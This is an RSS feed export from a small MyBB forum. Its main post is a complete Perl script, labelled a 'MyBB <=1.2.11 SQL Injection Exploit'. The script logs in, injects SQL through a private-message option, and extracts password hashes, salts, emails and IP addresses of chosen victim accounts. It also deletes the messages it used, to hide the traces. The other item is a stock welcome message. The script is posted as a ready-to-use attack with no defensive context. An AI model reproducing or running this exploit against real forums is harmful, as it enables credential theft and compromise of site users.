<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://uiuiu.mybb.su/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>jhkjhk</title>
		<link>http://uiuiu.mybb.su/</link>
		<description>jhkjhk</description>
		<language>ru-ru</language>
		<lastBuildDate>Fri, 16 Jan 2009 20:27:31 +0300</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>hhh</title>
			<link>http://uiuiu.mybb.su/viewtopic.php?pid=2#p2</link>
			<description>&lt;p&gt;#!/usr/bin/perl&lt;/p&gt;
						&lt;p&gt;#&lt;br /&gt;# MyBB &amp;lt;=1.2.11 SQL Injection Exploit based on &lt;a href=&quot;http://www.waraxe.us/advisory-64.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.waraxe.us/advisory-64.html&lt;/a&gt;&lt;br /&gt;#&lt;br /&gt;# Needs MySQL &amp;gt;=4.1 and a valid registration.&lt;br /&gt;#&lt;br /&gt;# By F&lt;br /&gt;#&lt;/p&gt;
						&lt;p&gt;use IO::Socket;&lt;br /&gt;use LWP::UserAgent;&lt;br /&gt;use HTTP::Cookies;&lt;br /&gt;use HTML::Entities;&lt;/p&gt;
						&lt;p&gt;####&lt;/p&gt;
						&lt;p&gt;	print(&amp;quot;\n&amp;quot;);&lt;br /&gt;	print(&amp;quot;##################################################&amp;#160; ##########################\n&amp;quot;);&lt;br /&gt;	print(&amp;quot;#&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;MyBB &amp;lt;=1.2.11 SQL Injection Exploit by F&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;#\n&amp;quot;);&lt;br /&gt;	print(&amp;quot;##################################################&amp;#160; ##########################\n&amp;quot;);&lt;/p&gt;
						&lt;p&gt;if(@ARGV&amp;lt;5){&lt;br /&gt;	print(&amp;quot;# Usage: perl mybb1211.pl host path user pass victim_uid [last_victim_uid] #\n&amp;quot;);&lt;br /&gt;	print(&amp;quot;##################################################&amp;#160; ##########################\n&amp;quot;);&lt;br /&gt;	exit;&lt;br /&gt;};&lt;/p&gt;
						&lt;p&gt;$host=&amp;quot;http://&amp;quot;.$ARGV[0];&lt;br /&gt;$path=$ARGV[1];&lt;br /&gt;$user=$ARGV[2];&lt;br /&gt;$pass=$ARGV[3];&lt;br /&gt;$vid1=$ARGV[4];&lt;/p&gt;
						&lt;p&gt;if(@ARGV&amp;lt;=5){&lt;br /&gt;	$vidn=$vid1;&lt;br /&gt;}else{&lt;br /&gt;	$vidn=$ARGV[5];&lt;br /&gt;};&lt;/p&gt;
						&lt;p&gt;print(&amp;quot;\n&amp;quot;);&lt;br /&gt;print(&amp;quot; [~] Host: &amp;quot;.$host.&amp;quot;\n&amp;quot;);&lt;br /&gt;print(&amp;quot; [~] Path: &amp;quot;.$path.&amp;quot;\n&amp;quot;);&lt;br /&gt;print(&amp;quot; [~] User: &amp;quot;.$user.&amp;quot;\n&amp;quot;);&lt;br /&gt;print(&amp;quot; [~] Pass: &amp;quot;.$pass.&amp;quot;\n&amp;quot;);&lt;br /&gt;print(&amp;quot; [~] From&amp;#160; #&amp;quot;.$vid1.&amp;quot;\n&amp;quot;);&lt;br /&gt;print(&amp;quot; [~] To&amp;#160; &amp;#160; #&amp;quot;.$vidn.&amp;quot;\n&amp;quot;);&lt;br /&gt;print(&amp;quot;\n&amp;quot;);&lt;/p&gt;
						&lt;p&gt;####&lt;/p&gt;
						&lt;p&gt;# create $browser and $cookie_jar&lt;br /&gt;$browser=LWP::UserAgent-&amp;gt;new() or die(&amp;quot; [-] Cannot create new UserAgent\n&amp;quot;);&lt;br /&gt;$cookie_jar=HTTP::Cookies-&amp;gt;new();&lt;br /&gt;$browser-&amp;gt;cookie_jar($cookie_jar);&lt;/p&gt;
						&lt;p&gt;# try to log in&lt;br /&gt;$result=$browser-&amp;gt;post(&lt;br /&gt;	$host.$path.&amp;quot;member.php&amp;quot;,&lt;br /&gt;	Content=&amp;gt;[&lt;br /&gt;&amp;#160; &amp;#160; &amp;quot;action&amp;quot;=&amp;gt;&amp;quot;do_login&amp;quot;,&lt;br /&gt;&amp;#160; &amp;#160; &amp;quot;username&amp;quot;=&amp;gt;$user,&lt;br /&gt;&amp;#160; &amp;#160; &amp;quot;password&amp;quot;=&amp;gt;$pass,&lt;br /&gt;&amp;#160; &amp;#160; &amp;quot;url&amp;quot;=&amp;gt;$host.$path.&amp;quot;index.php&amp;quot;,&lt;br /&gt;&amp;#160; &amp;#160; &amp;quot;submit&amp;quot;=&amp;gt;&amp;quot;Login&amp;quot;,&lt;br /&gt;	],&lt;br /&gt;);&lt;/p&gt;
						&lt;p&gt;# check cookie&lt;br /&gt;if($cookie_jar-&amp;gt;as_string=~m/mybbuser=.*?;/){&lt;br /&gt;	print(&amp;quot; [+] Login successful\n&amp;quot;);&lt;br /&gt;}else{&lt;br /&gt;	print(&amp;quot; [-] Login unsuccessful\n&amp;quot;);&lt;br /&gt;	exit;&lt;br /&gt;};&lt;/p&gt;
						&lt;p&gt;# try to get uid&lt;br /&gt;$result=$browser-&amp;gt;get($host.$path.&amp;quot;usercp.php&amp;quot;);&lt;/p&gt;
						&lt;p&gt;# check result&lt;br /&gt;if($result-&amp;gt;as_string=~m/member\.php\?action=profile&amp;amp;amp;uid=([0-9]*?)&amp;quot;/){&lt;br /&gt;	$uid=$1;&lt;br /&gt;	print(&amp;quot; [+] Getting uid successful: &amp;quot;.$uid.&amp;quot;\n&amp;quot;);&lt;br /&gt;}else{&lt;br /&gt;	print(&amp;quot; [-] Getting uid unsuccessful\n&amp;quot;);&lt;br /&gt;	exit;&lt;br /&gt;};&lt;/p&gt;
						&lt;p&gt;# construct exploit&lt;br /&gt;$exploit =&amp;quot;yes&#039;,&#039;0&#039;,&#039;0&#039;),&amp;quot;;&lt;br /&gt;$exploit.=&amp;quot;(&#039;&amp;quot;.$uid.&amp;quot;&#039;,&#039;&amp;quot;.$uid.&amp;quot;&#039;,&#039;&amp;quot;.$uid.&amp;quot;&#039;,&#039;1&#039;,&#039;haxx_result&#039;,&#039;0&#039;,concat(&#039;(haxx_start)&#039;,&amp;quot;;&lt;br /&gt;for($vid=$vid1;$vid&amp;lt;=$vidn;$vid++){&lt;br /&gt;	$exploit.=&amp;quot;ifnull((select concat(uid,&#039;-&#039;,username,&#039;:&#039;,password,&#039;:&#039;,salt,&#039;::&#039;,email,&#039;-&#039;,usergroup,&#039;-&#039;,additionalgroups,&#039;-&#039;,website,&#039;-&#039;,regip,&#039;(haxx_delim)&#039;) from mybb_users where uid=&amp;quot;.$vid.&amp;quot;),&#039;&#039;),&amp;quot;;&lt;br /&gt;};&lt;br /&gt;$exploit.=&amp;quot;&#039;(haxx_end)&#039;),&#039;&amp;quot;.time().&amp;quot;&#039;,&#039;0&#039;,&#039;no&#039;,&#039;yes&#039;,&#039;0&#039;,&#039;0&#039;),&amp;quot;;&lt;br /&gt;$exploit.=&amp;quot;(&#039;&amp;quot;.$uid.&amp;quot;&#039;,&#039;&amp;quot;.$uid.&amp;quot;&#039;,&#039;&amp;quot;.$uid.&amp;quot;&#039;,&#039;1&#039;,&#039;haxx_message=0&#039;,&#039;0&#039;,&#039;nuthin0&#039;,&#039;&amp;quot;.time().&amp;quot;&#039;,&#039;0&#039;,&#039;no&#039;,&#039;yes&amp;quot;;&lt;/p&gt;
						&lt;p&gt;# try to send exploit&lt;br /&gt;$result=$browser-&amp;gt;post(&lt;br /&gt;	$host.$path.&amp;quot;private.php&amp;quot;,&lt;br /&gt;	Content=&amp;gt;[&lt;br /&gt;&amp;#160; &amp;#160; &amp;quot;action&amp;quot;=&amp;gt;&amp;quot;do_send&amp;quot;,&lt;br /&gt;&amp;#160; &amp;#160; &amp;quot;subject&amp;quot;=&amp;gt;&amp;quot;haxx_message=&amp;quot;.(1+rand(65536)),&lt;br /&gt;&amp;#160; &amp;#160; &amp;quot;message&amp;quot;=&amp;gt;&amp;quot;nuthin&amp;quot;.(1+rand(65536)),&lt;br /&gt;&amp;#160; &amp;#160; &amp;quot;to&amp;quot;=&amp;gt;$user,&lt;br /&gt;&amp;#160; &amp;#160; &amp;quot;options[disablesmilies]&amp;quot;=&amp;gt;$exploit,&lt;br /&gt;	],&lt;br /&gt;);&lt;/p&gt;
						&lt;p&gt;# check if user is valid&lt;br /&gt;if(	($result-&amp;gt;as_string=~m/Your account has either been suspended or you have been banned from accessing this resource./) ||&lt;br /&gt;	($result-&amp;gt;as_string=~m/You do not have permission to access this page./) ||&lt;br /&gt;	($result-&amp;gt;as_string=~m/Your account may still be awaiting activation or moderation./)&lt;br /&gt;){&lt;br /&gt;	print(&amp;quot; [-] User has no permission to send private messages. This can happen if the user is suspended, banned, unactivated, or for other similar reasons.\n&amp;quot;);&lt;br /&gt;	exit;&lt;br /&gt;};&lt;/p&gt;
						&lt;p&gt;# check the 5 minute cap&lt;br /&gt;if($result-&amp;gt;as_string=~m/You have already submitted the same private message to the same recipient within the last 5 minutes./){&lt;br /&gt;	print(&amp;quot; [-] Unsuccessful attempt to fool MyBB with the 5 minute limit on sending private messages. Please run the exploit again.\n&amp;quot;);&lt;br /&gt;	exit;&lt;br /&gt;};&lt;/p&gt;
						&lt;p&gt;# check if it successfully sent the messages -&amp;gt; REMOVED, does not work on some installations&lt;br /&gt;#if($result-&amp;gt;as_string=~m/Thank you, your private message has successfully been sent./){&lt;br /&gt;	print(&amp;quot; [+] Sending messages was successful.\n&amp;quot;);&lt;br /&gt;#}else{&lt;br /&gt;#	print(&amp;quot; [-] Sending messages was unsuccessful.\n&amp;quot;);&lt;br /&gt;#	print($result-&amp;gt;as_string);&lt;br /&gt;#	exit;&lt;br /&gt;#};&lt;/p&gt;
						&lt;p&gt;# delete auxiliary messages&lt;br /&gt;print(&amp;quot; [+] Deleting auxiliary messages.\n&amp;quot;);&lt;br /&gt;$result=$browser-&amp;gt;get($host.$path.&amp;quot;private.php?fid=1&amp;quot;);&lt;br /&gt;while($result-&amp;gt;as_string=~m/private\.php\?action=read&amp;amp;amp;pmid=([0-9]*?)&amp;quot;&amp;gt;haxx_message=[0-9]*?&amp;lt;/g){&lt;br /&gt;	$pmid=$1;&lt;br /&gt;	$result=$browser-&amp;gt;get($host.$path.&amp;quot;private.php?action=delete&amp;amp;pmid=&amp;quot;.$pmid);&lt;br /&gt;	$result=$browser-&amp;gt;get($host.$path.&amp;quot;private.php?fid=1&amp;quot;);&lt;br /&gt;};&lt;/p&gt;
						&lt;p&gt;# download and delete messages&lt;br /&gt;print(&amp;quot; [+] Exploit successful.\n&amp;quot;);&lt;br /&gt;print(&amp;quot;\n&amp;quot;);&lt;/p&gt;
						&lt;p&gt;while($result-&amp;gt;as_string=~m/private\.php\?action=read&amp;amp;amp;pmid=([0-9]*?)&amp;quot;&amp;gt;haxx_result&amp;lt;/g){&lt;br /&gt;	$pmid=$1;&lt;br /&gt;	$result=$browser-&amp;gt;get($host.$path.&amp;quot;private.php?action=read&amp;amp;pmid=&amp;quot;.$pmid);&lt;br /&gt;	if($result-&amp;gt;as_string=~m/\(haxx_start\)(.*)\(haxx_end\)/){&lt;br /&gt;&amp;#160; &amp;#160; $pm=$1;&lt;br /&gt;&amp;#160; &amp;#160; $pm=~s/\(haxx_delim\)/\n/g;&lt;br /&gt;&amp;#160; &amp;#160; $pm=decode_entities($pm);&lt;br /&gt;&amp;#160; &amp;#160; print($pm);&lt;br /&gt;	};&lt;br /&gt;	$result=$browser-&amp;gt;get($host.$path.&amp;quot;private.php?action=delete&amp;amp;pmid=&amp;quot;.$pmid);&lt;br /&gt;	$result=$browser-&amp;gt;get($host.$path.&amp;quot;private.php?fid=1&amp;quot;);&lt;br /&gt;};&lt;/p&gt;</description>
			<author>mybb@mybb.ru (lapochka)</author>
			<pubDate>Fri, 16 Jan 2009 20:27:31 +0300</pubDate>
			<guid>http://uiuiu.mybb.su/viewtopic.php?pid=2#p2</guid>
		</item>
		<item>
			<title>Тестовое сообщение</title>
			<link>http://uiuiu.mybb.su/viewtopic.php?pid=1#p1</link>
			<description>&lt;p&gt;Благодарим за выбор нашего сервиса!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (lapochka)</author>
			<pubDate>Fri, 16 Jan 2009 20:25:14 +0300</pubDate>
			<guid>http://uiuiu.mybb.su/viewtopic.php?pid=1#p1</guid>
		</item>
	</channel>
</rss>
